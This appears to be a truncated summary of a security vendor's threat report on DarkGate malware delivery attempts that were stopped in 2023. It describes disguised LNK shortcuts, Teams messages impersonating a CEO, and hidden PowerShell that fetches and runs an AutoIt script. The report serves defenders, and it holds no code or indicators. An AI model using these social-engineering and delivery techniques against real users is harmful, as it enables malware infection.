This report summarizes three DarkGate delivery attempts against Critical Start MDR customers in September and October 2023 that were detected and stopped before DarkGate deployed. Attackers used social engineering and “living off the land” Windows tools rather than exploiting known CVEs, commonly delivering ZIP files that contained LNK shortcuts disguised as PDFs (double extensions and PDF icons). In the October case, they mass-messaged employees via Microsoft Teams while impersonating the CEO and hosted the ZIP on a compromised SharePoint site. Clicking the lure launched hidden PowerShell to create a temp folder, download AutoIt3.exe plus an .au3 script, and execute it, a pattern mirrored in other vendor research. The report provides IOCs (hashes, IPs, domains, URLs) and detection/mitigat

Join for free to read